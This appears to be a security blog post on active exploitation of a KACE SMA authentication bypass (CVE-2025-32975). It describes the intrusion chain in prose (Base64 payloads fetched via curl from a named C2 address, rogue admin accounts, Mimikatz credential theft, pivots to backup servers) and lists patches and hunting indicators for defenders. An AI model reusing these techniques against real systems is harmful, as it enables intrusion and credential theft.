CVE-2025-32975: Attackers Are Already Inside Unpatched KACE SMA Environments

CybrPulse

CybrPulse

3 min read
CVE-2025-32975: Attackers Are Already Inside Unpatched KACE SMA Environments

If you're running Quest KACE Systems Management Appliance and you haven't patched since May 2025, you may already be compromised.

Arctic Wolf researchers detected active exploitation of CVE-2025-32975 — a CVSS 10.0 authentication bypass in KACE SMA's Single Sign-On mechanism — beginning the week of March 9, 2026. The patch has been available for nearly a year. The attackers aren't waiting for you to catch up.

What the Vulnerability Does

CVE-2025-32975 lives in KACE SMA's SSO authentication handling. Exploiting it requires no valid credentials. An attacker can impersonate any legitimate user and walk straight into full administrative control of the appliance.

KACE SMA is an on-premises endpoint management platform. Organizations use it to push software, monitor endpoints, enforce policy, and manage system configuration across their environments. It has native access to everything. That's precisely why it's on the target list.

The Attack Chain Arctic Wolf Is Seeing

This isn't speculative. Researchers observed the full intrusion sequence in compromised customer environments.

Initial access: Attackers bypass SSO authentication and seize administrative accounts. No brute force. No phishing. They just log in.

Command execution: Once in, they use KACE's native `KPluginRunProcess` functionality to run remote commands. Payloads arrive Base64-encoded via curl from a known C2 server: `216.126.225.156`. The encoding is basic evasion — just enough to slip past casual log inspection.

Persistence: The attackers abuse `runkbot.exe`, a legitimate KACE SMA background process used for script execution and package management, to create unauthorized administrative accounts. Rogue users get added to both local and domain administrator groups. Hidden PowerShell scripts — `Enable-UpdateServices.ps1` and `taskband.ps1` — modify registry settings to ensure the backdoor survives reboots and routine maintenance.

Credential harvesting: Mimikatz gets deployed. Arctic Wolf observed it running under the filename `asd.exe` — a low-effort disguise that still evades signature detection on systems without behavioral monitoring. Plaintext credentials come out of memory.

Lateral movement: Equipped with harvested credentials and domain enumeration (via `net time`, `net group`, and user listing commands), the attackers pivot laterally. The destination: domain controllers and enterprise backup servers.

That last detail matters. Researchers observed attackers establishing RDP sessions specifically to Veeam and Veritas backup infrastructure. This is pre-ransomware positioning. Attackers who control your backups control your recovery options.

Scope and Exposure

The vulnerability affects all KACE SMA branches that haven't applied the May 2025 patches. Quest released fixes across every active release line:

  • Branch 13.0 → upgrade to 13.0.385
  • Branch 13.1 → upgrade to 13.1.81
  • Branch 13.2 → upgrade to 13.2.183
  • Branch 14.0 → apply Patch 5 (version 14.0.341)
  • Branch 14.1 → apply Patch 4 (version 14.1.101)

The fact that exploitation is still happening nearly a year after patch release tells you how many organizations treat on-premises management appliances — as set-it-and-forget-it infrastructure that doesn't follow the same patching cadence as workstations and servers.

That assumption is catastrophically wrong. Management appliances are high-value targets precisely because they have privileged access to everything else.

What to Do Right Now

If you're running internet-exposed KACE SMA: Take it offline immediately. An authentication bypass with a CVSS 10.0 score and active exploitation means exposure is not a theoretical risk. Remove it from the public internet, restrict access to VPN or firewall-controlled segments, then patch.

Hunt for existing compromise before you patch: Check for:

  • Unauthorized accounts in KACE SMA and Active Directory added since March 9
  • `runkbot.exe` spawning unexpected child processes
  • Curl-based outbound connections to `216.126.225.156` in firewall or proxy logs
  • Base64-encoded command strings in SMA logs
  • Registry modifications from `Enable-UpdateServices.ps1` or `taskband.ps1`
  • `asd.exe` or unexpected Mimikatz artifacts on KACE SMA hosts

Audit your backup infrastructure: If attackers got lateral movement to your Veeam or Veritas environment, verify backup integrity now. Don't assume your recovery options are clean.

Rotate credentials: Any account that authenticated through KACE SMA since March 9 should be treated as potentially compromised. That includes service accounts.

The Broader Pattern

This follows a pattern that's become reliable: a critical vulnerability in an on-premises management appliance sits unpatched for months, then gets weaponized right before attackers are ready to operationalize it at scale. KACE SMA joins a list that includes Ivanti, Fortinet, and ConnectWise products that were exploited in the same way — quietly, after defenders stopped paying attention.

The threat actors here showed operational maturity. They used living-off-the-land techniques (runkbot.exe, KPluginRunProcess), minimal fingerprints, and made a beeline for backup infrastructure. The goal isn't just access — it's positioning for an outcome you won't recover from easily.

Patch your KACE SMA. Pull it off the internet. Check your domain controllers and backup servers for unauthorized RDP sessions. The window to get ahead of this is already narrow.

Read more